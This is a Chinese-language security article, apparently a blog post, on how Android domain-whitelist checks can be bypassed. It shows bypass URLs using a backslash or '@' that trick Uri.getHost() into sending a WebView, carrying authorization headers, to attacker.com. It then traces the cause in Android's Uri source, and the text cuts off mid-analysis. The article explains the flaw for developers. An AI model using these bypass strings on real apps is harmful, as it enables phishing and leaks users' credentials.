<div id="contenttxt"><h2>引言</h2><p><strong style="color: rgb(0, 176, 80);">很多 Android 
组件都有响应外部链接的能力，如果攻击者能随意的指定这些组件所响应的 url，轻则可以引导被攻击的 APP 弹出钓鱼页面，重则可能远程执行恶意 
js 代码。因此 APP 开发者必然要对传入的 url 进行校验，而设置域名白名单就是一种简单常见且具有较高安全性的防御方法。</strong></p><p>然而由于一些开发者并不完全通晓调用方法的底层特性，使得看起来万无一失的白名单校验形同虚设。本文列举几种常见的 Android 域名白名单校验写法，并深入源码指出其中存在的风险和绕过方法。</p><h2>一、 Url加入反斜杠”\”</h2><h3>1.1. 方法描述</h3><p>先来看一种典型的域名校验写法:</p><pre><code class="hljs markdown"><span style="padding-right:.1px;"><span class="cm-comment" style="color:rgb(170,85,0);">/<span class="hljs-bullet">* &nbsp;Uri 结构</span></span></span><br/><span style="padding-right:.1px;"><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-bullet">*</span> &nbsp; [<span class="hljs-string">scheme:</span>][<span class="hljs-symbol">//authority</span>][<span class="hljs-string">path</span>][<span class="hljs-symbol">?query</span>][<span class="hljs-string">#fragment</span>]</span></span><br/><span style="padding-right:.1px;"><span class="cm-comment" style="color:rgb(170,85,0);">*/</span></span><br/><span style="padding-right:.1px;">[<span class="cm-variable" style="color:rgb(0,0,0);">check_v1</span>]</span><br/><span style="padding-right:.1px;"><span class="cm-variable" style="color:rgb(0,0,0);">Uri</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">parse</span>(<span class="cm-variable" style="color:rgb(0,0,0);">attackerControlledString</span>);</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);">if</span> (<span class="cm-string" style="color:rgb(170,17,17);">"legitimate.com"</span>.<span class="cm-variable" style="color:rgb(0,0,0);">equals</span>(<span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>()) <span class="cm-operator" style="color:rgb(152,26,26);">||</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>().<span class="cm-variable" style="color:rgb(0,0,0);">endsWith</span>(<span class="cm-string" style="color:rgb(170,17,17);">".legitimate.com"</span>)) {</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">webView</span>.<span class="cm-variable" style="color:rgb(0,0,0);">loadUrl</span>(<span class="cm-variable" style="color:rgb(0,0,0);">attackerControlledString</span>, <span class="cm-variable" style="color:rgb(0,0,0);">getAuthorizationHeaders</span>());</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-comment" style="color:rgb(170,85,0);">// or webView.loadUrl(uri.toString()) </span></span><br/><span style="padding-right:.1px;">}</span></code></pre><p>然而…</p><pre><code class="hljs ruby"><span style="padding-right:.1px;"><span class="cm-variable-3" style="color:rgb(0,136,85);">String</span> <span class="cm-variable" style="color:rgb(0,0,0);">url</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"http://attacker.com\\.legitimate.com/smth"</span></span>; </span><br/><span style="padding-right:.1px;"><span class="cm-variable" style="color:rgb(0,0,0);">Log</span>.<span class="cm-variable" style="color:rgb(0,0,0);">d</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"getHost:"</span></span>, <span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">parse</span>(<span class="cm-variable" style="color:rgb(0,0,0);">url</span>).<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>()); &nbsp; &nbsp; &nbsp; &nbsp; <span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-regexp">//</span> 输出 attacker.com\.legitimate.com ! </span></span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">if</span></span> (<span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">parse</span>(<span class="cm-variable" style="color:rgb(0,0,0);">url</span>).<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>().<span class="cm-variable" style="color:rgb(0,0,0);">endsWith</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">".legitimate.com"</span></span>)) { </span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">webView</span>.<span class="cm-variable" style="color:rgb(0,0,0);">loadUrl</span>(<span class="cm-variable" style="color:rgb(0,0,0);">url</span>, <span class="cm-variable" style="color:rgb(0,0,0);">getAuthorizationHeaders</span>()); &nbsp;<span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-regexp">//</span> 成功加载 attacker.com！</span></span><br/><span style="padding-right:.1px;">}</span></code></pre><p>可以看到 getHost() 和 loadUrl() 的表现不一致，if检验跳转目标是<code>legitimate.com</code>，但执行时浏览器会把反斜线纠正为正斜线去访问<code>attacker.com</code>。那么如果是用 equals() 来做完整的 host 检验该怎么办呢？只需加一个‘@’就能隔断非法前缀。</p><pre><code class="hljs javascript"><span style="padding-right:.1px;"><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-built_in">String</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">url</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"http://attacker.com\\@legitimate.com/smth"</span></span>;</span><br/><span style="padding-right:.1px;"><span class="cm-variable" style="color:rgb(0,0,0);">Log</span>.<span class="cm-variable" style="color:rgb(0,0,0);">d</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"Wow"</span></span>, <span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">parse</span>(<span class="cm-variable" style="color:rgb(0,0,0);">url</span>).<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>()); &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// 输出 legitimate.com!</span></span></span><br/><span style="padding-right:.1px;"><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">webView</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">loadUrl</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">url</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">getAuthorizationHeaders</span></span><span class="hljs-comment">()); </span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// 加载 attacker.com！</span></span></span></code></pre><h3>1.2. 分析原因</h3><p>看来<code>android.net.Uri</code>的 parse() 是有安全缺陷的，我们扒拉一下代码定位问题…</p><pre><code class="hljs cs"><span style="padding-right:.1px;">[<span class="cm-variable" style="color:rgb(0,0,0);">frameworks</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-keyword">base</span></span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">core</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">java</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">android</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">net</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">java</span>]</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">public</span></span></span><span class="hljs-function"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">static</span></span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function">Uri</span></span><span class="hljs-function"> </span><span class="cm-def" style="color:rgb(0,0,255);"><span class="hljs-function"><span class="hljs-title">parse</span></span></span><span class="hljs-function">(</span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">uriString</span></span></span><span class="hljs-function">) </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">return</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">new</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">StringUri</span>(<span class="cm-variable" style="color:rgb(0,0,0);">uriString</span>);</span><br/><span style="padding-right:.1px;">}</span></code></pre><p>继续看这个内部类<code>StringUri</code></p><pre><code class="hljs java"><span style="padding-right:.1px;">[<span class="cm-variable" style="color:rgb(0,0,0);">frameworks</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">base</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">core</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">java</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">android</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">net</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">java</span>]</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">private</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">static</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">class</span></span></span><span class="hljs-class"> </span><span class="cm-def" style="color:rgb(0,0,255);"><span class="hljs-class"><span class="hljs-title">StringUri</span></span></span><span class="hljs-class"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">extends</span></span></span><span class="hljs-class"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-class"><span class="hljs-title">AbstractHierarchicalUri</span></span></span><span class="hljs-class"> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;...</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">private</span></span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">StringUri</span></span></span><span class="hljs-function"><span class="hljs-params">(</span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">uriString</span></span></span><span class="hljs-function"><span class="hljs-params">)</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">this</span></span>.<span class="cm-variable" style="color:rgb(0,0,0);">uriString</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">uriString</span>;</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;...</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">private</span></span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function">Part</span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">getAuthorityPart</span></span></span><span class="hljs-function"><span class="hljs-params">()</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">if</span></span> (<span class="cm-variable" style="color:rgb(0,0,0);">authority</span> <span class="cm-operator" style="color:rgb(152,26,26);">==</span> <span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-keyword">null</span></span>) {</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);">String</span> <span class="cm-variable" style="color:rgb(0,0,0);">encodedAuthority</span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">parseAuthority</span>(<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">this</span></span>.<span class="cm-variable" style="color:rgb(0,0,0);">uriString</span>, <span class="cm-variable" style="color:rgb(0,0,0);">findSchemeSeparator</span>());</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">return</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">authority</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">Part</span>.<span class="cm-variable" style="color:rgb(0,0,0);">fromEncoded</span>(<span class="cm-variable" style="color:rgb(0,0,0);">encodedAuthority</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">return</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">authority</span>;</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;...</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">static</span></span></span><span class="hljs-function"> </span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function">String</span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">parseAuthority</span></span></span><span class="hljs-function"><span class="hljs-params">(</span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">uriString</span></span></span><span class="hljs-function"><span class="hljs-params">, </span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params"><span class="hljs-keyword">int</span></span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">ssi</span></span></span><span class="hljs-function"><span class="hljs-params">)</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-keyword">int</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">length</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">uriString</span>.<span class="cm-variable" style="color:rgb(0,0,0);">length</span>();</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// If "//" follows the scheme separator, we have an authority.</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">if</span></span><span class="hljs-comment"> (</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">length</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">></span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">ssi</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">2</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">&&</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">uriString</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">charAt</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">ssi</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">1</span></span><span class="hljs-comment">) </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">==</span></span><span class="hljs-comment"> </span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;/&#39;</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">&&</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">uriString</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">charAt</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">ssi</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">2</span></span><span class="hljs-comment">) </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">==</span></span><span class="hljs-comment"> </span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;/&#39;</span></span><span class="hljs-comment">) {</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// We have an authority.</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// Look for the start of the path, query, or fragment, or the</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// end of the string.</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-comment">int</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">end</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">ssi</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">3</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">LOOP</span></span><span class="hljs-comment">: </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">while</span></span><span class="hljs-comment"> (</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">end</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment"><</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">length</span></span><span class="hljs-comment">) {</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">switch</span></span><span class="hljs-comment"> (</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">uriString</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">charAt</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">end</span></span><span class="hljs-comment">)) {</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">case</span></span><span class="hljs-comment"> </span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;/&#39;</span></span><span class="hljs-comment">: </span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// Start of path</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">case</span></span><span class="hljs-comment"> </span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;?&#39;</span></span><span class="hljs-comment">: </span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// Start of query</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">case</span></span><span class="hljs-comment"> </span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;#&#39;</span></span><span class="hljs-comment">: </span><span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// Start of fragment</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">break</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">LOOP</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;}</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">end</span></span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">++</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;}</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">return</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">uriString</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">substring</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">ssi</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">3</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">end</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;} </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">else</span></span><span class="hljs-comment"> {</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">return</span></span><span class="hljs-comment"> </span><span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-comment">null</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;}</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;}</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment">}</span></span></code></pre><p>这里就明显看到<code>StringUri</code>没有对authority部分做反斜杠的识别处理, 接着找<code>StringUri</code>的父类<code>AbstractHierarchicalUri</code>瞧瞧：</p><pre><code class="hljs java"><span style="padding-right:.1px;">[<span class="cm-variable" style="color:rgb(0,0,0);">frameworks</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">base</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">core</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">java</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">android</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">net</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">java</span>]</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">private</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">abstract</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">static</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">class</span></span></span><span class="hljs-class"> </span><span class="cm-def" style="color:rgb(0,0,255);"><span class="hljs-class"><span class="hljs-title">AbstractHierarchicalUri</span></span></span><span class="hljs-class"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">extends</span></span></span><span class="hljs-class"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-class"><span class="hljs-title">Uri</span></span></span><span class="hljs-class"> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">private</span></span></span><span class="hljs-function"> </span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function">String</span></span><span class="hljs-function"> </span><span class="cm-variable" 